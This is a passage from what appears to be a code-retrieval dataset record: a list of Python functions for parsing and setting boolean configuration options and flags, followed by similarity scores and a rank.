"def get_bool(options, name, default=False):\n value = options.get(name)\n if not value:\n return default\n if value.lower() == 'true':\n return True\n elif value.lower() == 'false':\n return False\n else:\n raise zc.buildout.UserError(\n \"Invalid value for %s option: %s\" % (name, value))",
"def setBoolean(self, key, value):\n self.__config.setValue(key, QtCore.QVariant(value))\n self.__saved = False",
"def bool_flag(s):\n if s.lower() in ['off', 'false', '0']:\n return False\n if s.lower() in ['on', 'true', '1']:\n return True\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag (0 or 1)\")",
"def getbool(option, default = None):\n\treturn _cfg.getboolean('rosshm', option, fallback = default)",
"def cmakeBoolOptionIsSet(self, opt):\n\n if self.envcmake.has_key( opt ):\n\n val = str(self.envcmake.get(opt,\"\"))\n\n if val == \"1\" or val == \"ON\" or val == \"YES\":\n\n return True\n\n return False",
"def getbool(self, section, option, default=None):\r\n return self.get(section, option, type=bool, default=default)",
"def set_parameter(self, name, value = None):\n set_option = False\n for parameter in self.parameters:\n if name in parameter.names:\n if isinstance(parameter, _Switch):\n if value is None:\n import warnings\n warnings.warn(\"For a switch type argument like %s, \"\n \"we expect a boolean. None is treated \"\n \"as FALSE!\" % parameter.names[-1])\n parameter.is_set = bool(value)\n set_option = True\n else:\n if value is not None:\n self._check_value(value, name, parameter.checker_function)\n parameter.value = value\n parameter.is_set = True\n set_option = True\n if not set_option:\n raise ValueError(\"Option name %s was not found.\" % name)",
"def __call__(self, parser, namespace, value, unused_option_string=None):\n try:\n setattr(namespace, self.dest, util.parse_bool(value))\n except TypeError as err:\n raise argparse.ArgumentError(self, 'Boolean value required') from err",
"def getboolean(self, option, default = None, section = None):\n v = self.get(option, default, section)\n if isinstance(v, str):\n v = v.lower()\n if v not in self.cfg._boolean_states:\n raise ValueError, \"Not a boolean: %s\" % v\n v = self.cfg._boolean_states[v]\n return v",
"def setBit(self,i,boolval):\n self.boolVals[i]=boolval",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def set_gateway(self, bool_value):\n self.chkbtn_gateway.set(bool_value)",
"def option_default_true(arg: Any) -> bool:\n\n if isinstance(arg, bool):\n return arg\n\n if arg is None:\n return True\n\n sanitized = arg.strip().lower()\n\n if sanitized == \"true\":\n return True\n elif sanitized == \"false\":\n return False\n else:\n raise ValueError(f\"Directive option argument '{arg}' is not valid. \"\n f\"Valid arguments are 'true' or 'false'.\")",
"def test_set_type_bool(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.logging_config.disable_existing_loggers\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )\n assert result.exit_code == 0",
"def set_boolean(x):\n\n if x:\n return \"True\"\n else:\n return \"False\"",
"def bool_flag(s):\n FALSY_STRINGS = {\"off\", \"false\", \"0\"}\n TRUTHY_STRINGS = {\"on\", \"true\", \"1\"}\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def init_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"init_flag must be bool.\")\n self.set_init_flag(value)\n self._init_flag = value",
"def register_bool(self, name, short=None, default=None, group=None, help=None):\n self._register(name, self._parse_bool, short=short, default=default,\n group=group, help=help)",
"def _setForBinding (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forBinding = value\n return value",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def opt_option(self, option):\n if \"=\" in option:\n path, value = option.split(\"=\")\n self.setOverride(\n DEFAULT_CONFIG,\n path.split(\"/\"),\n value,\n self.overrides\n )\n else:\n self.opt_option(\"{}=True\".format(option))",
"def setOption(self, pluginOptionDict):\n return True",
"def set_opts(self, opts):\n opts = dict(opts)\n for k, v in opts.iteritems():\n try:\n # Fix for lofar parameter set integration:\n # If the attribute is a bool, test if it is a string.\n # and then try to parse it\n if hasattr(self, k):\n if isinstance(self.__getattribute__(k), bool):\n if isinstance(v, bool) or v == None:\n # just enter the bool into the parameter\n pass\n elif isinstance(v, basestring):\n # Try parse it as a parameter set bool string\n v = self._parse_string_as_bool(v)\n else:\n # raise error\n raise tcError(\"unknown type for bool variable\")\n if k == 'sb':\n # quick check on the sb sintax\n import re\n def sb_re(strg):\n return bool(re.match(\"^[0-9,.]*$\", strg))\n if not sb_re(v): raise RuntimeError('Parameter \"{0}\" is not defined properly.'.format(k))\n\n if v == \"none\":\n v = None\n self.__setattr__(k, v)\n except tcError, e:\n # Catch and re-raise as a RuntimeError\n raise RuntimeError('Parameter \"{0}\" is not defined properly.\\\n \\n {1}'.format(k, str(e)))",
"def opt_option(self, option):\n\n if \"=\" in option:\n path, value = option.split('=')\n self._setOverride(\n DEFAULT_CONFIG,\n path.split('/'),\n value,\n self.overrides\n )\n else:\n self.opt_option('%s=True' % (option,))",
"def is_bool(self):\n validator = self.__class__.get_setting_validator(self.key, **self.get_kwargs())\n\n return self.__class__.validator_is_bool(validator)",
"def getBoolean(self, section, option, default=False):\n return self.get(section, option, default, _bool)",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def device_set_property_bool(pnd, property, bEnable):\n return _nfc.device_set_property_bool(pnd, property, bEnable)",
"def CONST_BOOL(self, t):\n t.value = False if t.value == '#false' else True\n return t",
"def config_get_bool(section, option):\n return __CONFIG.getboolean(section, option)",
"def get_bool(section, option, default=False):\n\tres = get(section, option, default)\n\n\tif res == default:\n\t\treturn default\n\n\tif res.lower() == \"true\" or res == \"1\":\n\t\treturn True\n\n\treturn default",
"def get_bool(self, sect, opt):\r\n return self.get_safe(sect, opt) == \"True\"",
"def _writeBool(self, val):\n self.__writeValue(self.boolFormat, val)",
"def argparse_bool(x):\n return str(x).lower() in {'true', '1', 'yes'}",
"def boolean_flag(parser, name, default=False, help=None):\n dest = name.replace('-', '_')\n parser.add_argument(\"--\" + name, action=\"store_true\", default=default, dest=dest, help=help)\n parser.add_argument(\"--no-\" + name, action=\"store_false\", dest=dest)",
"def parse_bool(section, optionname):\n string = section.dict[optionname]\n if string.lower() == \"true\" or string.lower() == \"yes\":\n return True\n elif string.lower() == \"false\" or string.lower() == \"no\":\n return False\n elif string.isdigit():\n return bool(int(string))\n else:\n raise ValueError(\"Option \" + optionname + \" in section \" + section.name\n + \" is not a valid boolean!\")",
"def getBooleanOption(aConfig, aSection, aOption):\n if aConfig.has_option(aSection, aOption):\n return aConfig.getboolean(aSection, aOption)\n else:\n # Default value. This should match the initialization done in\n # __init__ of class task in taskHandler.py\n if (aOption == \"fullScreenMode\" or\n aOption == \"formatOutput\" or\n aOption == \"compressOutput\"):\n return True\n else:\n # \"useWebDriver\"\n # \"runSlowTests\"\n # \"runSkipTests\"\n # \"useGrid\"\n return False",
"def bool_attr(attr):\n if attr.lower() == \"true\":\n val = True\n elif attr.lower() == \"false\":\n val = False\n else:\n raise EzXMLError(\"Must be \"\\\n \"'true' or 'false'. Not %s\" % (attr))\n return val",
"def _setForDocument (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forDocument = value\n return value",
"def explicit_bool(value: bool) -> bool:\n return value",
"def _boolean_callback(self, *args):\n\t\tnew_value = args[1].get_boolean()\n\n\t\targs[0].set_state(GLib.Variant.new_boolean(new_value))\n\t\tself.window.set_picture_title()\n\t\tself.get_active_pane().hide_options_menu()",
"def bool_config_override(key):\n if os.environ.get(key):\n try:\n truth_value = strtobool(os.environ[key])\n if truth_value == 1:\n config_opts[key] = True\n else:\n config_opts[key] = False\n except ValueError:\n values = [\"y\", \"yes\", \"t\", \"true\", \"on\", 1, \"n\", \"f\", \"false\", \"off\", 0]\n raise BuildTestError(f\"Must be one of the following {values}\")",
"def force_bool(value):\n if isinstance(value, (bool, int)):\n return bool(value)\n\n boolean_states = ConfigParser._boolean_states\n if not value.lower() in boolean_states:\n return None\n\n return boolean_states[value.lower()]",
"def bool_to_on_off(boolean: bool):\n if boolean:\n return \"on\"\n return \"off\"",
"def writeAttributeBool(self, *args):\n return _libsbml.XMLOutputStream_writeAttributeBool(self, *args)",
"def add_boolean(self, name, **kwargs):\n self.add(Flags.BooleanFlag(name, **kwargs))",
"def getBoolValue(self):\n return _libsbml.ConversionOption_getBoolValue(self)",
"def getSetBoolean(self, key: str, default: bool | None = None) -> bool:\n value = self.parsedConfig.getboolean(key, default)\n self.parsedConfig[key] = str(value)\n return value",
"def virtual_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"virtual_flag must be bool.\")\n self._virtual_flag = value",
"def Bool(arg):\n return arg.lower() in ('y', 'true', 't', '1')",
"def str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def test_set_boolean(self):\n setting_name = 'project_bool_setting'\n url = reverse(\n 'projectroles:api_project_setting_set',\n kwargs={'project': self.project.sodar_uuid},\n )\n post_data = {\n 'app_name': EX_APP_NAME,\n 'setting_name': setting_name,\n 'value': True,\n }\n response = self.request_knox(url, method='POST', data=post_data)\n self.assertEqual(response.status_code, 200, msg=response.content)\n obj = AppSetting.objects.get(name=setting_name, project=self.project)\n self.assertEqual(obj.get_value(), True)",
"def boolean(self, boolean):\n\n self._boolean = boolean",
"def bool_on_off(value):\n return 'on' if value else 'off'",
"def set_signal_active(self, bool_value):\n self.chkbtn_signal_active.set(bool_value)",
"def set_simple(value):\r\n LogOptions._SIMPLE = bool(value)",
"def restricted_bool(x):\n try:\n x = bool(x)\n except ValueError:\n raise argparse.ArgumentTypeError(\"%r not a bool literal\" % (x,))\n return x",
"def get_bool(self, name, default=False):\n return self.get_as(self.parse_bool, name, default, value_type=bool)",
"def set_flag(self, set_flag):\n\n self._set_flag = set_flag",
"def read_boolean_option(config, section, option):\n if not config.has_section(section):\n return\n\n return config.has_option(section, option)",
"def boolean(self, label, component, config, name, default=False):\n\n default = self.setting(config, name, default)\n return st.checkbox(label, value=default, key=component + name)",
"def writeBoolean(self, value: bool):\n self.writeByte(1 if value else 0)",
"def bool_flag(s):\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def set_option(name, option):\n ffi.lib.LLVMPY_SetCommandLine(_encode_string(name),\n _encode_string(option))",
"def str2bool(v) -> bool:\n\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(bool_arg):\n if bool_arg.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif bool_arg.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise ValueError(f'Boolean argument expected. Got {bool_arg} instead.')",
"def setOption(self, name, value):\n petsc.optionsSetValue(name, value)\n return",
"def SetFlag(self, flag, option_state):\r\n \r\n state = self.state\r\n \r\n if option_state:\r\n state |= flag\r\n else:\r\n state &= ~flag\r\n\r\n self.state = state\r\n\r\n if flag in [self.buttonClose, self.buttonMaximize, self.buttonMinimize, self.buttonPin]:\r\n self.ResetButtons()\r\n \r\n return self",
"def flag_set(self, flag):\n if self.flags & flag != 0:\n return True\n else:\n return False",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def get_attr_bool(self, name, default=False):\n v = self.get_attr(name)\n if v is None:\n return default\n if v.lower() in [\"t\", \"true\", \"y\", \"yes\", \"1\"]:\n return True\n else:\n return False",
"def _prep_bool_arg(arg):\n return bool(strtobool(str(arg)))",
"def get_bool(self, key, default):\n value = self.get(key, default)\n if isinstance(value, bool):\n return value\n return value.lower() in (\"true\", \"t\", \"yes\", \"y\")",
"def val(self, new_val: bool) -> None:\n if type(new_val) != bool:\n raise TypeError(f\"Invalid literal {new_val} with type '{new_val.__class__.__name__}' for parameter 'new_val'\")\n self._val: bool = new_val\n return",
"def set_value(self, item, value):\n super(t_8_Bit_Options, self).set_value(item, value)\n\n if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):\n self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX)",
"def bool_value(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"bool_value\")",
"def on_off_bool(value):\n return value == 'on'",
"def test_getboolean_with_default(self):\n self.assertEqual(self.config.getboolean('advanced','p'),None)\n self.assertEqual(self.config.getboolean('advanced','p',True),True)",
"def set_option(k, v=\"True\"):\n if k == \"log\":\n OPTIONS_TABLE[k] = getattr(logging, v.upper(), None)\n elif k == \"backend\":\n OPTIONS_TABLE[k] = sdm_backends.Backends.get_backend_name(v)\n elif k == \"config\":\n OPTIONS_TABLE[k] = sdm_util.get_abs_path(v)",
"def set_option(self, dest, value, force=True):\r\n if hasattr(self._option_values, dest) and not force:\r\n return\r\n setattr(self._option_values, dest, value)",
"def str2bool(v):\n if v.lower() == 'true':\n return True\n elif v.lower() == 'false':\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(arg):\n if arg == 'True':\n return True\n elif arg == 'False':\n return False\n else:\n raise argparse.ArgumentTypeError(\"Expected 'True' or 'False'.\")",
"def is_bool(self):\n answer = self._call('is_bool')\n return answer.yes",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')"
] | [
"0.81047094",
"0.7505482",
"0.72757864",
"0.72743803",
"0.70943683",
"0.705241",
"0.70266336",
"0.70084757",
"0.6970434",
"0.6921304",
"0.6904598",
"0.68884057",
"0.6847308",
"0.6807809",
"0.67250526",
"0.6707975",
"0.6671484",
"0.664038",
"0.66249967",
"0.6597783",
"0.651423",
"0.65032226",
"0.6467936",
"0.64536244",
"0.64346325",
"0.6423603",
"0.6385956",
"0.63799703",
"0.636212",
"0.6358862",
"0.63382375",
"0.6336264",
"0.63281167",
"0.63273937",
"0.6322064",
"0.6310586",
"0.62914115",
"0.6268994",
"0.62598103",
"0.62272274",
"0.6226767",
"0.62248677",
"0.62077576",
"0.6181871",
"0.6151472",
"0.6138179",
"0.61309224",
"0.61262757",
"0.6112616",
"0.61059684",
"0.60956436",
"0.60815",
"0.6065185",
"0.6057164",
"0.60273063",
"0.6021811",
"0.60124916",
"0.60037017",
"0.5995529",
"0.59951234",
"0.593159",
"0.59293365",
"0.5928432",
"0.5922593",
"0.59152263",
"0.58977544",
"0.5894333",
"0.5887994",
"0.5887036",
"0.5880179",
"0.5872852",
"0.5868595",
"0.58626956",
"0.58602226",
"0.585622",
"0.585152",
"0.5847893",
"0.58343893",
"0.5832523",
"0.580831",
"0.5808267",
"0.5806948",
"0.57901365",
"0.5779698",
"0.57780004",
"0.57780004",
"0.5768884",
"0.57676816",
"0.5766831",
"0.57611686",
"0.5751903",
"0.57467055",
"0.57390195",
"0.5735766",
"0.5732144",
"0.5725484",
"0.5723149",
"0.5706481",
"0.56815565",
"0.567936",
"0.567936"
] | 0.0 | -1 |
Set the value. (And calls the base class) This will also check for Options to set the bools. FAULTS_ACTIVE FAULTS_CURRENT >>> BIT_FAULT_PROBE = 0 >>> BIT_FAULT_OVERTEMP = 1 >>> BIT_FAULT_PANEL_OPEN = 2 >>> BIT_FAULT_HIGH_VOLTAGE = 3 >>> BIT_FAULT_RAM_CRC = 4 >>> BIT_FAULT_EEPROM_CRC = 5 >>> BIT_FAULT_GPIO_ERROR = 6 >>> BIT_FAULT_LTFAULT_ERROR = 7 >>> BIT_FAULT_TRIGGER_ERROR = 8 >>> BIT_FAULT_HARDWARE_EXC = 9 >>> BIT_FAULT_TRIGGER_GLITCH = 10 >>> BIT_FAULT_OVERVOLTAGE = 11 >>> BIT_FAULT_TEMP_SENSOR = 12 | def set_value(self, item, value):
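    # Forward the write to the base class, then refresh the decoded fault-bit tables:
    # a FAULT_ACTIVE write updates faults_current, a FAULT_LATCHED write updates faults_latched.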
super(t_16_Bit_Options, self).set_value(item, value)
if(item == t_16_Bit_Options.FAULT_ACTIVE):
self.set_bools(value, self.faults_current, t_16_Bit_Options.BIT_FAULT_MAX )
if(item == t_16_Bit_Options.FAULT_LATCHED):
self.set_bools(value, self.faults_latched, t_16_Bit_Options.BIT_FAULT_MAX ) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def set(self, value): # interface for BlueSky plans\n if str(value).lower() not in (\"fly\", \"taxi\", \"return\"):\n msg = \"value should be either Taxi, Fly, or Return.\"\n msg + \" received \" + str(value)\n raise ValueError(msg)\n\n if self.busy.value:\n raise RuntimeError(\"spin is operating\")\n\n status = DeviceStatus(self)\n \n def action():\n \"\"\"the real action of ``set()`` is here\"\"\"\n if str(value).lower() == \"taxi\":\n self.taxi()\n elif str(value).lower() == \"fly\":\n self.pre_fly()\n self.fly()\n self.post_fly()\n elif str(value).lower() == \"return\":\n self.motor.move(self.return_position)\n\n def run_and_wait():\n \"\"\"handle the ``action()`` in a thread\"\"\"\n self.busy.put(True)\n action()\n self.busy.put(False)\n status._finished(success=True)\n \n threading.Thread(target=run_and_wait, daemon=True).start()\n return status",
"def set_value(self, item, value):\n super(t_8_Bit_Options, self).set_value(item, value)\n\n if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):\n self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX)",
"def set_overflow_status(self, value):\n TikCheckUtil.check_equality(\n get_soc_name(), ASCEND_910,\n \"this api doesn't support version: %s\" % get_soc_name())\n TikCheckUtil.check_type_match(\n value, int, \"value should be Int, \"\n \"invalid type: {}\".format(type(value)))\n TikCheckUtil.check_in_range(\n value, range(_MAX_OVERFLOW_STATUS),\n \"value should be 0 or 1, invalid value: {}\".format(value))\n with self.new_scope():\n self.emit(\n tvm.call_extern(\"uint64_t\", \"set_overflow\",\n type_convert(Expr(value, dtype=\"uint64\"))),\n ONE_IR)",
"def fault_debug(value: bool = False) -> None:",
"def set_flag(self, flag_name, value):\n flags = {'C':0, # Carry\n 'Z':1, # Zero\n 'I':2, # Interrupt mask\n 'D':3, # Decimal\n 'B':4, # Break\n 'V':6, # Overflow\n 'N':7} # Negative\n\n flag_reg = self.get_register('P')\n if value == 1:\n new_flag = flag_reg | 1 << flags[flag_name]\n else:\n new_flag = flag_reg & ~(1 << flags[flag_name])\n\n self.set_register('P', new_flag)",
"def _setEnumFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureEnumSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def test_set_invalid_value(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.agent_name\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n )\n assert result.exit_code == 1",
"def _setIntFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureIntSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def setFlag(self, flag, value) -> None:\n ...",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def set_value (self):\n raise NotImplementedError",
"def value(self, value):\n if self.value == value: # case where we are setting at the same value\n return\n if (not self.has_data) or self.is_unknown or self.is_byte:\n if not ida_bytes.patch_byte(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n elif self.is_word:\n if not ida_bytes.patch_word(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n elif self.is_dword:\n if not ida_bytes.patch_dword(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n elif self.is_qword:\n if not ida_bytes.patch_qword(self.ea, value):\n raise RuntimeError(\"Unable to patch value: {}\".format(self))\n else:\n raise RuntimeError(\"Unable to patch value: {}\".format(self))",
"def fset(self, value):\n message = \"Overriding a constant value is an illegal operation: {0} = {1}.\".format(\n name.__name__,\n value)\n raise TypeError(message)",
"async def set_bit(self, instance, value):\n print(f\"Server: {'set_bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_server(value)\n else:\n print('device is None')",
"def set_value(self, value):\n if self.value:\n raise ValueError(\"Already has a Value:\", self)\n\n self.value = value\n\n if self.value != 0:\n self.possible = None\n self.solved = True",
"def Set(self,value):\n if value:\n onoff = 0x01\n else:\n onoff = 0x00\n self.Bus.Write_uInt8(self.Address,0x20+self.Pin, onoff)",
"def set_n(self, value):\n\n # set the negative register if greater than 0x80\n self.p &= ~(const.FLAG_NEGATIVE)\n self.p |= const.FLAG_NEGATIVE if value >= 0x80 else 0b0",
"def set_state(self, value):\n _LOGGER.debug(\"%s: Set state to %d\", self.entity_id, value)\n self._flag_state = True\n\n params = {ATTR_ENTITY_ID: self.entity_id}\n if value == 0:\n if self.char_current_state.value != value:\n self.char_current_state.set_value(3)\n self.call_service(DOMAIN, SERVICE_OPEN_COVER, params)\n elif value == 1:\n if self.char_current_state.value != value:\n self.char_current_state.set_value(2)\n self.call_service(DOMAIN, SERVICE_CLOSE_COVER, params)",
"def setFlag(self, whichFlag, whichValue):\n \n try:\n if self.__debugOn == True:\n print(\"Flags in: %x\" %self.__flags)\n \n # Get temproary flag value that blanks out the flag.\n tFlag = (~whichFlag) & self.__flags\n \n # Set our flag to the given value.\n self.__flags = tFlag | whichValue\n \n if self.__debugOn == True:\n print(\"Flags out: %x\" %self.__flags)\n \n except:\n raise\n \n return",
"def set_test_expectations(self, security_flag, is_flaky,\n unsymbolized_crash_state):\n self.expected_security_flag = security_flag\n self.is_flaky = is_flaky\n self.expected_state = unsymbolized_crash_state",
"def set_heat(self, state: bool, value: int = 0):\r\n if state:\r\n self.msg_send_upr.data[0] = b\"\\x22\"[0]\r\n self.msg_send_upr.data[2:4] = value.to_bytes(2, \"little\")\r\n else:\r\n self.msg_send_upr.data[0] = b\"\\x23\"[0]\r\n self.send_and_flush(self.msg_send_upr)",
"def light(self, value: bool | int, /) -> None:",
"def test_set_fails_when_setting_non_primitive_type(self):\n with pytest.raises(\n ClickException, match=\"Attribute `behaviours` is not allowed to be updated!\"\n ):\n self.runner.invoke(\n cli,\n [*CLI_LOG_OPTION, \"config\", \"set\", \"skills.dummy.behaviours\", \"value\"],\n standalone_mode=False,\n catch_exceptions=False,\n )",
"def fungible(self, value):\n if value is not None:\n self._fungible = True if value else False",
"def eflags_set(self, bit: int, value: bool) -> None:\n if self.eflags_get(bit):\n if not value:\n self.eflags &= ~(1 << bit)\n else:\n if value:\n self.eflags |= 1 << bit",
"def set_wraperror(self, value: bool = True) -> None:\n self.WRAPERROR = tools.coerce_bool(value)",
"def set_power_management(value: int) -> None:",
"async def bit(self, instance, value):\n print(f\"Server: {'bit'} Got 'put' request from outside: new value is {value} and type {type(value)}\")\n if self.device is not None:\n self.device.set_bit_client(value)\n else:\n print('device is None')",
"def set_bitmask(self, value):\r\n self.__bitmask__ = value | 0xFF00",
"def _set_value(self, value, name, option):\r\n self.set_value(name, option, value)",
"def flag(instance, attribute, value):\n if value not in [True, False, 1, 0, '1', '0']:\n raise ValueError(\"{} must only True, False, 1, 0, '1' or '0'\".format(attribute.name))",
"def set_custom_value(self, value):\n self.logger.info(\"Set custom value : %s\" % value)\n\n try:\n self._answer_payload['custom_value'] = value\n except Exception as e:\n self.logger.error(\"Error on set custom variables : %s\" % e)",
"def set_state(self, value, reason, data=None):\r\n return self.connection.set_alarm_state(self.name, reason, value, data)",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def set_interrupt_polarity(self, value):\n\n if value == 0:\n self.__ioconfig = self.__helper.updatebyte(self.__ioconfig, 1, 0)\n self.__bus.write_byte_data(\n self.__ioaddress, self.IOCON, self.__ioconfig)\n if value == 1:\n self.__ioconfig = self.__helper.updatebyte(self.__ioconfig, 1, 1)\n self.__bus.write_byte_data(\n self.__ioaddress, self.IOCON, self.__ioconfig)\n return",
"def test_preprocessing_status_setter_valueerror(self):\n with self.assertRaises(ValueError):\n self.tester.preprocessing_status = 'not a valid state'",
"def set(self, value):\n # We can't store the values in the given format, we need to convert\n # them in string first. We also need to validate the value type.\n\n parser_map = {\n 'integer': int,\n 'numeric': float,\n 'date': dateutil_parser.parse,\n 'datetime': dateutil_parser.parse,\n 'keyboardshortcut': json.dumps\n }\n\n error_map = {\n 'keyboardshortcut': 'keyboard shortcut'\n }\n\n try:\n if self._type in ('boolean', 'switch', 'node'):\n assert isinstance(value, bool)\n elif self._type == 'options':\n has_value = next((True for opt in self.options\n if 'value' in opt and opt['value'] == value),\n False)\n assert (has_value or (self.select2 and self.select2['tags']))\n elif self._type == 'date':\n value = parser_map[self._type](value).date()\n else:\n value = parser_map.get(self._type, lambda v: v)(value)\n if self._type == 'integer':\n value = self.normalize_range(value)\n assert isinstance(value, int)\n if self._type == 'numeric':\n value = self.normalize_range(value)\n assert (\n isinstance(value, int) or isinstance(value, float) or\n isinstance(value, decimal.Decimal))\n except Exception as e:\n current_app.logger.exception(e)\n return False, gettext(\n \"Invalid value for {0} option.\".format(\n error_map.get(self._type, self._type)))\n\n pref = UserPrefTable.query.filter_by(\n pid=self.pid\n ).filter_by(uid=current_user.id).first()\n\n value = \"{}\".format(value)\n if pref is None:\n pref = UserPrefTable(\n uid=current_user.id, pid=self.pid, value=value\n )\n db.session.add(pref)\n else:\n pref.value = value\n db.session.commit()\n\n return True, None",
"def setValue(self, key, val):\n if key == 'active':\n self.active = val\n else:\n super(CREBundleDiagnosticPolicy, self).setValue(key, val)",
"def initial_status(self, value):\n\n if not isinstance(value, Real):\n raise TypeError(\"Value for initial_status shoulde be real numbers.\")\n\n if isclose(value, 0):\n raise ValueError(\"Value for initial_status cannot be zero.\")\n\n self._initial_status = value",
"def setValue(self, value):\r\n # Clamp values to [0,1]\r\n self.__value = max(0, min(value, 1))",
"def Set(self,value):\n self.Bus.Write_uInt8(self.Address,0x50+self.Pin,value)",
"def set_machine_fan(self, val):\n if val > self.max_fan or val < 0:\n logger.error(\"/dev/ttyUSB{0} tried setting Fan speed {1}%\"\n .format(self.dev_id, val)\n )\n return False\n try:\n self._write(chr(self.incoming_fan))\n sleep(0.5)\n self._write(chr(val))\n return True\n except:\n logger.error(\"Cannot set Fan speed for /dev/ttyUSB{0}\"\n .format(self.dev_id)\n )\n return False",
"def _setVals(self, outcome=0):\n self.outcome = outcome",
"def set(self, param, value):\r\n # continuous testing of inputs\r\n if self.testing_unit.testing_level > 1 and not self.testing_unit.c_test_set_inp(param, value):\r\n raise ValueError(\"set won't run, input's aren't valid.\")\r\n\r\n # continuous testing of functional inputs\r\n if self.testing_unit.testing_level > 0:\r\n if param in [\"weighting_bias\"]:\r\n if not [self.testing_unit.c_test_weighting_bias][[\"weighting_bias\"].index(param)](value):\r\n raise ValueError(\"Bad \" + param + \" input. See log or raise testing verbosity.\")\r\n\r\n self.__locals[param] = value # Security Risk\r\n return 1 # Success\r",
"def set_system_state(self, chksum, ack, FPGAhold, FPGAcom):\n byte = 0\n if chksum:\n byte |= (1 << 6)\n if ack:\n byte |= (1 << 4)\n if FPGAhold:\n byte |= (1 << 1)\n if FPGAcom:\n byte |= (1 << 0)\n self.system_state = byte",
"def set_value(self,x):\n self._value = x",
"def set_value(self,x):\n self._value = x",
"def set_byte(ea, value):\n if not ida_bytes.patch_byte(ea, value):\n raise RuntimeError(\"Unable to set value {} at {}\".format(ea, value))",
"def set_interrupt_defaults(self, port, value):\n\n if port == 0:\n self.__bus.write_byte_data(self.__ioaddress, self.DEFVALA, value)\n else:\n self.__bus.write_byte_data(self.__ioaddress, self.DEFVALB, value)\n return",
